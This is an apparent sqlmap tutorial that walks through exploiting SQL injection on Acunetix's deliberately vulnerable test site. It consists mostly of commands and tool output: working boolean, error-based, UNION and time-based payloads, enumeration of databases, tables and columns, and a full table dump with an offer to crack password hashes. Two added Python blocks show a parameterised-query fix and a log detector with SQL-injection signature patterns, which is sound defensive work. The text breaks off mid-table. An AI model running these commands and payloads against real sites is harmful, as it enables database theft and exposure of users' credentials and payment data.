
SQLMap

Hello!

Hi everyone!

SQLMap is a tool for automating the detection and exploitation of SQL injection vulnerabilities.

To have the latest version, and therefore be able to use all of its features, we check out the current development revision with svn:

root@bt:/pentest/database/sqlmap# svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

We now have the latest version of SQLMap.

Now we will run a test.

First we need to find a vulnerable web page, and then check whether it actually allows injection and extraction of information.

Let's begin:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws.
Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:36:55

[16:36:55] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:36:55] [INFO] resuming injection data from session file
[16:36:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:36:55] [INFO] testing connection to the target url
[16:36:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:36:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:36:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'
[*] shutting down at 16:36:56

I have highlighted the important information in red.

We can see that it is vulnerable, so now we will extract both the users and the databases.
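To show why the cat parameter reported above is injectable, and what the fix looks like, here is an added example that is not part of the original post or of the test application. An in-memory SQLite table stands in for the MySQL categ table (its rows are constructed sample data, using the column names sqlmap lists later), a string-concatenated query plays the role of the vulnerable listproducts.php, and a second handler applies the two standard mitigations: strict type validation of the id and a parameterised query. The boolean-based payload is the one sqlmap reported; the false-condition variant is constructed to show the oracle the blind technique relies on.

```python
"""Vulnerable vs. hardened handling of an integer id parameter (added example)."""
import sqlite3


def make_db():
    # Constructed stand-in for the categ table seen in the sqlmap output.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE categ (cat_id INTEGER, cname TEXT, cdesc TEXT)")
    conn.executemany(
        "INSERT INTO categ VALUES (?, ?, ?)",
        [
            (1, "Posters", "sample description"),
            (2, "Paintings", "sample description"),
            (3, "Stickers", "sample description"),
            (4, "Graffity", "sample description"),
        ],
    )
    return conn


def list_products_vulnerable(conn, cat):
    # The request parameter is pasted straight into the statement, so anything
    # after the number becomes part of the WHERE clause and is evaluated as SQL.
    sql = "SELECT cat_id, cname FROM categ WHERE cat_id=" + cat
    return conn.execute(sql).fetchall()


def list_products_safe(conn, cat):
    # 1) Validate the type: a category id must be a plain positive integer.
    if not cat.isdigit():
        raise ValueError("cat must be a positive integer")
    # 2) Bind the value instead of splicing it: the driver never parses it as SQL.
    return conn.execute(
        "SELECT cat_id, cname FROM categ WHERE cat_id=?", (int(cat),)
    ).fetchall()


def demo():
    """Run both handlers against a normal request and the boolean probes."""
    conn = make_db()
    true_probe = "1 AND 1192=1192"   # payload sqlmap reported for this parameter
    false_probe = "1 AND 1192=1193"  # constructed: same shape, condition is false
    results = {
        "vuln_plain": list_products_vulnerable(conn, "1"),
        # True condition: page looks identical to the plain request ...
        "vuln_true": list_products_vulnerable(conn, true_probe),
        # ... false condition: row disappears. That difference is the blind oracle.
        "vuln_false": list_products_vulnerable(conn, false_probe),
        "safe_plain": list_products_safe(conn, "1"),
    }
    try:
        list_products_safe(conn, true_probe)
        results["safe_probe"] = "accepted"
    except ValueError:
        results["safe_probe"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:11s} -> {value}")
```

The type check alone would already stop every payload in the sqlmap report, since none of them is a bare integer, but the bound parameter is the fix that holds when the value has to be a free-form string; log the rejected value (truncated) and the source address so the probe is visible to the SOC.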

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 --dbs --users

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent
 is illegal. It is the end user's responsibility to obey all applicable local, state and
 federal laws. Authors assume no liability and are not responsible for any misuse or damage
caused by this program

[*] starting at 16:41:00

[16:41:00] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:41:00] [INFO] resuming injection data from session file
[16:41:00] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:41:00] [INFO] testing connection to the target url
[16:41:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:41:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:41:01] [INFO] fetching database users
database management system users [1]:
[*] 'acuart'@'localhost'

[16:41:01] [INFO] fetching database names
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[16:41:01] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:41:01

The information about the databases, as well as the user, is highlighted in red.
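Every one of the runs above leaves a trace in the web server's access log: the injection payloads arrive URL-encoded in the query string, and sqlmap's default User-Agent carries its own banner (the same string as the tool's header line). The following is an added example, not part of the original post, of a small detector that parses Apache combined-format log lines and flags the four technique types sqlmap listed (boolean-based, error-based, UNION, time-based) plus the banner. The log lines are constructed sample data that reuse the payload shapes from the output above; the timestamps, addresses and sizes are invented.

```python
"""Flag SQL injection probes in access-log lines (added example, constructed data)."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample traffic in Apache "combined" format; not captured from any server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2012:16:36:55 +0100] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Jan/2012:16:36:56 +0100] "GET /listproducts.php?cat=1%20AND%201192%3D1192 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev (http://www.sqlmap.org)"
10.0.0.5 - - [12/Jan/2012:16:36:56 +0100] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 HTTP/1.1" 200 6010 "-" "sqlmap/1.0-dev (http://www.sqlmap.org)"
10.0.0.5 - - [12/Jan/2012:16:36:57 +0100] "GET /listproducts.php?cat=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.7 - - [12/Jan/2012:16:37:01 +0100] "GET /listproducts.php?cat=3 HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# One pattern per technique type in the sqlmap report, matched on the decoded value.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"INFORMATION_SCHEMA|FLOOR\s*\(\s*RAND", re.I)),
]


def analyse_request(path, user_agent):
    """Return (parameter, label) pairs for every signature hit in one request."""
    hits = []
    query = urlsplit(path).query
    # parse_qsl URL-decodes the values, so %20 / %3D / %28 become plain text.
    for name, value in parse_qsl(query, keep_blank_values=True):
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((name, label))
    if user_agent.lower().startswith("sqlmap/"):
        hits.append(("user-agent", "sqlmap banner"))
    return hits


def scan_log(text):
    """Parse each line and keep only the requests that triggered a signature."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # malformed line: skip rather than crash the whole scan
        hits = analyse_request(match["path"], match["ua"])
        if hits:
            findings.append(
                {"ip": match["ip"], "ts": match["ts"], "path": match["path"], "hits": hits}
            )
    return findings


def per_source(findings):
    """Count flagged requests per client address, for alert thresholds."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["path"], finding["hits"])
    print(per_source(scan_log(SAMPLE_LOG)))
```

The banner check is the weakest of the signals (the User-Agent is trivially changed with a command-line option), so the payload patterns on the decoded parameter values are what to alert on; a burst of several distinct technique types from one address against one parameter, as the counter shows, is the characteristic footprint of an automated scan rather than a single malformed request.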

Now we will pull the tables of a specific database:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --tables

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable local,
 state and federal laws. Authors assume no liability and are not responsible for any misuse or
damage caused by this program

[*] starting at 16:46:44

[16:46:44] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:46:44] [INFO] resuming injection data from session file
[16:46:44] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:46:45] [INFO] testing connection to the target url
[16:46:45] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS CHAR),
CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:46:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:46:45] [INFO] fetching tables for database: acuart
[16:46:45] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+

[16:46:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:46:45

Now that we have the tables, we will go and look for the columns:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --columns

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is
 illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.
 Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:50:28

[16:50:28] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:50:28] [INFO] resuming injection data from session file
[16:50:28] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:50:29] [INFO] testing connection to the target url
[16:50:29] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),(SELECT
(CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:50:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:50:29] [INFO] fetching tables for database: acuart
[16:50:29] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:50:29] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:50:29] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:50:30] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'pictures' on database 'acuart'
[16:50:31] [INFO] fetching columns for table 'users' on database 'acuart'
Database: acuart
Table: categ
[3 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| cat_id | int(5)      |
| cdesc  | tinytext    |
| cname  | varchar(50) |
+--------+-------------+

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Database: acuart
Table: carts
[3 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| cart_id | varchar(100) |
| item    | int(11)      |
| price   | int(11)      |
+---------+--------------+

Database: acuart
Table: pictures
[8 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| a_id   | int(11)      |
| cat_id | int(11)      |
| img    | varchar(50)  |
| pic_id | int(5)       |
| plong  | text         |
| price  | int(11)      |
| pshort | mediumtext   |
| title  | varchar(100) |
+--------+--------------+

Database: acuart
Table: featured
[2 columns]
+--------------+---------+
| Column       | Type    |
+--------------+---------+
| feature_text | text    |
| pic_id       | int(11) |
+--------------+---------+

Database: acuart
Table: artists
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| adesc     | text        |
| aname     | varchar(50) |
| artist_id | int(5)      |
+-----------+-------------+

Database: acuart
Table: guestbook
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| mesaj    | text         |
| sender   | varchar(150) |
| senttime | int(32)      |
+----------+--------------+

[16:50:31] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/test.acunetix.com'

[*] shutting down at 16:50:31

We now have the information about the columns, so the last step is to dump the contents of the database:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://test.acunetix.com/listproducts.php?cat=1 -D acuart --dump

    sqlmap/1.0-dev (r4356) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal.
 It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:33

[16:56:33] [INFO] using '/pentest/database/sqlmap/output/test.acunetix.com/session' as session file
[16:56:33] [INFO] resuming injection data from session file
[16:56:33] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:56:33] [INFO] testing connection to the target url
[16:56:34] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: cat
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 1192=1192

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 5536 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,100,110,58),
(SELECT (CASE WHEN (5536=5536) THEN 1 ELSE 0 END)),CHAR(58,102,122,100,58),FLOOR(RAND(0)*2))x
 FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
 CONCAT(CHAR(58,106,100,110,58),IFNULL(CAST(CHAR(67,70,97,65,113,108,122,107,67,116) AS
 CHAR),CHAR(32)),CHAR(58,102,122,100,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat=1 AND SLEEP(5)
---

[16:56:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[16:56:34] [INFO] fetching tables for database: acuart
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
 acuart, artists, acuart, carts, acuart, categ, acuart, featured, acuart, guestbook, acuart, pictures,
 acuart, users
[16:56:34] [INFO] fetching columns for table 'guestbook' on database 'acuart'
[16:56:34] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': sender,
 varchar(150), mesaj, text, senttime, int(32)
[16:56:34] [INFO] fetching entries for table 'guestbook' on database 'acuart'
[16:56:35] [WARNING] if the problem persists with 'None' values please try to use hidden switch
--no-cast (fixing problems with some collation issues)
[16:56:35] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: guestbook
[0 entries]
+-------+--------+----------+
| mesaj | sender | senttime |
+-------+--------+----------+
+-------+--------+----------+

[16:56:35] [INFO] Table 'acuart.guestbook' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com
/dump/acuart/guestbook.csv'
[16:56:35] [INFO] fetching columns for table 'carts' on database 'acuart'
[16:56:35] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cart_id,
varchar(100), price, int(11), item, int(11)
[16:56:35] [INFO] fetching entries for table 'carts' on database 'acuart'
recognized possible password hashes in column cart_id. Do you want to crack them via a dictionary-based
 attack? [Y/n/q] y
[16:56:51] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files

[16:57:04] [INFO] using default dictionary
[16:57:04] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[16:57:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[16:57:46] [WARNING] no clear password(s) found 
Database: acuart
Table: carts
[43 entries]
+----------------------------------+------------+-------+
| cart_id                          | item       | price |
+----------------------------------+------------+-------+
| 59bc1b0b420b28ec09d673886c9e6c5e | 6          | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 0          | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 7          | 15000 |
| 103182aada3cc3df0f6eb53e12338805 | 3          | 986   |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 3          | 986   |
| 407f7a7006ae7e1e290a0deef4adddca | 5          | 444   |
| 407f7a7006ae7e1e290a0deef4adddca | 2          | 1230  |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -268435455 | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 3          | 986   |
| 94e69794012f981ba39b45e3d67b9bb4 | 6          | 10000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | -1         | 500   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 3          | 986   |
| ee7a540800a6314cb8e853294a3fd364 | -268435455 | 986   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 2          | 800   |
| 103182aada3cc3df0f6eb53e12338805 | 4          | 1000  |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 6          | 10000 |
| ee7a540800a6314cb8e853294a3fd364 | 0          | 986   |
| 103182aada3cc3df0f6eb53e12338805 | 6          | 10000 |
| 103182aada3cc3df0f6eb53e12338805 | 1          | 500   |
| 407f7a7006ae7e1e290a0deef4adddca | 7          | 1     |
| ee7a540800a6314cb8e853294a3fd364 | -1         | 986   |
| fb410f050b45babb0fa88ae1c7e5dcce | 2          | 800   |
| 407f7a7006ae7e1e290a0deef4adddca | 1          | 500   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 5          | 460   |
| 3fc1a7bc4d6afab0889708ed649f5e59 | 1          | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 1          | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 2          | 800   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 7          | 15000 |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 4          | 1000  |
| ee7a540800a6314cb8e853294a3fd364 | 268435455  | 986   |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 1          | 500   |
| ee7a540800a6314cb8e853294a3fd364 | 3          | 986   |
| 407f7a7006ae7e1e290a0deef4adddca | 6          | 123   |
| 357dce450e0ca7bd2d1c04f55905e10f | 1          | 500   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 268435455  | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 4          | 1000  |
| a33e8f5069b5a8d7e6b579697bfaf96d | 1          | 500   |
| 59bc1b0b420b28ec09d673886c9e6c5e | 5          | 460   |
| e8513b2f278260d085e29bc4491cdf0b | 2          | 8     |
| 94e69794012f981ba39b45e3d67b9bb4 | 3          | 986   |
| 92cd2d36a3ebf3e3227f8573f8682b98 | 1          | 500   |
| 62d636f894e9e726dc6a0300fd2aa2f3 | 2          | 800   |
| 9c7ab77a32a914594d838f1e657f56ab | 5          | 100   |
+----------------------------------+------------+-------+

[16:57:46] [INFO] Table 'acuart.carts' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump/acuart/carts.csv'
[16:57:46] [INFO] fetching columns for table 'categ' on database 'acuart'
[16:57:46] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': cat_id, int(5), cname, varchar(50), cdesc, tinytext
[16:57:46] [INFO] fetching entries for table 'categ' on database 'acuart'
Database: acuart
Table: categ
[4 entries]
+--------+---------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
----------------------------------------------------------------+-----------+
| cat_id | cdesc | cname |
+--------+-------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------
--------------------------------------------------------+-----------+
| 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
 Cras quis libero.\n Cras venenati | Posters |
| 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\n Cras venenati | Stickers |
| 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst.
Nulla nonummy. Cras quis libero.\n Cras venenati | Graffity |
| 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\n Sed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy.
Cras quis libero.\n Cras venenati | Paintings |
+--------+---------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
-----------------------------------------+-----------+

[16:57:48] [INFO] Table 'acuart.categ' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.com/dump
/acuart/categ.csv'
[16:57:48] [INFO] fetching columns for table 'featured' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': pic_id, int(11),
feature_text, text
[16:57:48] [INFO] fetching entries for table 'featured' on database 'acuart'
[16:57:48] [WARNING] the SQL query provided does not return any output
Database: acuart
Table: featured
[0 entries]
+--------------+--------+
| feature_text | pic_id |
+--------------+--------+
+--------------+--------+

[16:57:48] [INFO] Table 'acuart.featured' dumped to CSV file '/pentest/database/sqlmap/output
/test.acunetix.com/dump/acuart/featured.csv'
[16:57:48] [INFO] fetching columns for table 'artists' on database 'acuart'
[16:57:48] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session':
artist_id, int(5), aname, varchar(50), adesc, text
[16:57:48] [INFO] fetching entries for table 'artists' on database 'acuart'
Database: acuart
Table: artists
[3 entries]
+--------------------------------------------------------------------------------
-------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------
-+---------+-----------+
| adesc | aname | artist_id |
+---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------
---------------+---------+-----------+
| <p>\nLorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu.
 Phasellus sollicitudin. Vestibulum condimentum facilisis\nnulla. In hac habitasse platea dictumst. Nulla
 nonummy. Cras quis libero.\nCras venenatis. Aliquam posuere lobortis pede. Nullam fringilla urna id leo.\
nPraesent aliquet pretium erat. Praesent non odio. Pellentesque a magna a\nmauris vulputate lacinia. Aenean
 viverra. Class aptent taciti sociosqu ad\nlitora torquent per conubia nostra, per inceptos hymenaeos. Aliquam
 lacus.\nMauris magna eros, semper a, tempor et, rutrum et, tortor.\n</p>\n<p>\nLorem ipsum dolor sit amet,
consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum
